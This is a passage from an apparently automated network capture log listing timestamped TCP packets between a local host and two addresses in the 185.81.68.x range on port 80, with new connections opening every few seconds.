                                                              Dec 13, 2024 07:48:14.880177021 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:14.880593061 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:14.985320091 CET8049829185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:14.985359907 CET8049817185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:14.985502958 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:14.985624075 CET4982980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:14.985713005 CET4982980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:15.000324965 CET8049818185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:15.000339031 CET8049830185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:15.000403881 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:15.000421047 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:15.000685930 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:15.105493069 CET8049829185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:15.120474100 CET8049830185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:16.362895012 CET8049830185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:16.362961054 CET8049829185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:16.362981081 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:16.363018036 CET4982980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:17.992166996 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:17.992310047 CET4982980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:17.992434025 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:17.993232012 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:18.112126112 CET8049830185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:18.112165928 CET8049836185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:18.112216949 CET4983080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:18.112265110 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:18.112462997 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:18.112571001 CET8049829185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:18.112622976 CET4982980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:18.112926960 CET8049837185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:18.113078117 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:18.113078117 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:18.232157946 CET8049836185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:18.232973099 CET8049837185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:19.447086096 CET8049836185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:19.447169065 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:19.454444885 CET8049837185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:19.454528093 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:20.959250927 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:20.959574938 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:20.959903955 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:20.960232019 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:21.079427004 CET8049846185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:21.079451084 CET8049836185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:21.079514980 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:21.079540014 CET4983680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:21.079731941 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:21.079871893 CET8049837185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:21.079967022 CET4983780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:21.079974890 CET8049847185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:21.080025911 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:21.080219984 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:21.199506044 CET8049846185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:21.199902058 CET8049847185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:22.439553976 CET8049846185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:22.439634085 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:22.440085888 CET8049847185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:22.440135002 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.069962025 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:24.070363998 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:24.070631027 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.070883989 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.190351963 CET8049846185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:24.190447092 CET4984680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:24.190455914 CET8049855185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:24.190565109 CET8049856185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:24.190677881 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:24.190777063 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.190804958 CET8049847185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:24.191977024 CET4984780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.194046974 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:24.195647955 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:24.313750029 CET8049855185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:24.315453053 CET8049856185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:25.533108950 CET8049856185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:25.533309937 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:25.533883095 CET8049855185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:25.534477949 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.038974047 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:27.039442062 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:27.039494038 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.039710999 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.159205914 CET8049856185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:27.159219027 CET8049862185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:27.159332037 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:27.159400940 CET4985680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:27.159492970 CET8049863185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:27.159550905 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.159646034 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:27.159661055 CET8049855185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:27.159753084 CET4985580192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.159869909 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:27.281754017 CET8049862185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:27.281775951 CET8049863185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:28.517689943 CET8049862185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:28.518207073 CET8049863185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:28.519011021 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:28.519140005 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.147419930 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:30.147429943 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.147833109 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:30.147862911 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.267582893 CET8049863185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:30.267640114 CET4986380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:30.267738104 CET8049875185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:30.267755032 CET8049874185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:30.267940998 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.267957926 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:30.268120050 CET8049862185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:30.268177032 CET4986280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.268210888 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:30.268290043 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:30.388374090 CET8049875185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:30.388392925 CET8049874185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:31.617827892 CET8049875185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:31.617897034 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:31.617913961 CET8049874185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:31.618071079 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.131393909 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:33.131386995 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.131546974 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:33.132002115 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.251240015 CET8049881185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:33.251416922 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:33.251629114 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:33.251636028 CET8049882185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:33.251929998 CET8049875185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:33.252027035 CET4987580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:33.252027035 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.252262115 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.252450943 CET8049874185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:33.253545046 CET4987480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:33.371828079 CET8049881185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:33.372318983 CET8049882185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:34.642431974 CET8049882185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:34.643469095 CET8049881185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:34.643569946 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:34.644011021 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.274173975 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:36.274307013 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.274548054 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.274605989 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:36.394246101 CET8049893185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:36.394310951 CET8049894185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:36.394325972 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.394397020 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:36.394649029 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.394655943 CET8049881185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:36.394725084 CET4988180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:36.394809961 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:36.395204067 CET8049882185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:36.395251989 CET4988280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:36.514288902 CET8049893185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:36.514586926 CET8049894185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:37.974992037 CET8049893185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:37.975018024 CET8049894185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:37.975070953 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:37.975104094 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.491992950 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:39.492189884 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:39.492551088 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.492726088 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.611903906 CET8049900185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:39.611990929 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:39.612216949 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:39.612437010 CET8049901185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:39.612639904 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.612792969 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.613114119 CET8049893185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:39.613198996 CET4989380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:39.613348961 CET8049894185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:39.613404036 CET4989480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:39.731873035 CET8049900185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:39.732501984 CET8049901185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:40.970432997 CET8049900185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:40.970500946 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:40.971540928 CET8049901185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:40.971606970 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.600126028 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:42.600183010 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.600471973 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:42.600559950 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.720247030 CET8049907185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:42.720263958 CET8049908185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:42.720278978 CET8049900185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:42.720391035 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:42.720391035 CET4990080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:42.720436096 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.720627069 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:42.720639944 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.720726013 CET8049901185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:42.720784903 CET4990180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:42.840287924 CET8049907185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:42.840382099 CET8049908185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:44.063769102 CET8049907185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:44.063879013 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:44.064337015 CET8049908185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:44.064395905 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.569817066 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.569924116 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:45.570199966 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.570298910 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:45.689986944 CET8049908185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:45.690026045 CET8049919185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:45.690068960 CET8049920185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:45.690164089 CET4990880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.690222025 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.690222025 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:45.690320015 CET8049907185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:45.690392017 CET4990780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:45.690417051 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:45.690882921 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:45.810069084 CET8049919185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:45.810551882 CET8049920185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:47.050899982 CET8049919185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:47.050945044 CET8049920185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:47.051052094 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:47.051075935 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.678711891 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.679076910 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.679569006 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:48.679743052 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:48.798846006 CET8049926185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:48.798937082 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.799082041 CET8049919185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:48.799145937 CET4991980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.799166918 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:48.799478054 CET8049927185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:48.799551964 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:48.799683094 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:48.799695015 CET8049920185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:48.802017927 CET4992080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:48.918915987 CET8049926185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:48.919433117 CET8049927185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:50.142918110 CET8049927185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:50.142980099 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:50.143004894 CET8049926185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:50.143057108 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.649914026 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:51.650279999 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:51.650444031 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.650696039 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.843286037 CET8049927185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:51.843298912 CET8049938185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:51.843310118 CET8049939185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:51.843327999 CET8049926185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:51.843347073 CET4992780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:51.843411922 CET4992680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.843427896 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.843430042 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:51.843974113 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:51.844192982 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:51.963664055 CET8049938185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:51.963871002 CET8049939185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:53.239470005 CET8049938185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:53.239578962 CET8049939185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:53.239614010 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:53.239805937 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:54.901649952 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:54.901909113 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:54.902249098 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:54.902250051 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:55.021694899 CET8049945185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:55.021823883 CET8049939185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:55.021900892 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:55.021967888 CET8049946185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:55.022057056 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:55.022057056 CET4993980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:55.022243977 CET8049938185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:55.023924112 CET4993880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:55.053936005 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:55.053939104 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:55.173743963 CET8049946185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:55.173760891 CET8049945185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:56.359826088 CET8049946185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:56.359895945 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:56.359931946 CET8049945185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:56.359982967 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:56.894324064 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:56.894325018 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:57.014656067 CET8049946185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:57.015022993 CET8049945185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:57.015108109 CET4994680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:57.015110016 CET4994580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:58.139494896 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:58.140250921 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:58.259522915 CET8049952185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:58.259634018 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:58.260066986 CET8049953185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:58.260126114 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:58.260186911 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:58.260914087 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:58.379887104 CET8049952185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:58.380578041 CET8049953185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:59.678570032 CET8049953185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:59.678631067 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:59.706650019 CET8049952185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:59.706790924 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.302854061 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:01.302921057 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:01.333477020 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.336709023 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.423086882 CET8049953185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:01.423171043 CET4995380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:01.423197985 CET8049963185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:01.423516035 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:01.423562050 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:01.453623056 CET8049952185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:01.453876019 CET4995280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.456440926 CET8049964185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:01.456662893 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.456741095 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:01.543345928 CET8049963185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:01.576523066 CET8049964185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:02.785298109 CET8049963185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:02.786431074 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:02.833879948 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:02.834275961 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:02.838046074 CET8049964185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:02.838294983 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:03.019500971 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:03.019588947 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:03.301937103 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:03.316134930 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:03.409668922 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:03.425668001 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:03.930085897 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.018990993 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.081202984 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.128278017 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.303687096 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.304079056 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.350166082 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.350694895 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.423846006 CET8049963185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:04.423887968 CET8049970185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:04.423909903 CET4996380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.423958063 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.424305916 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:04.470163107 CET8049964185.81.68.147192.168.2.4
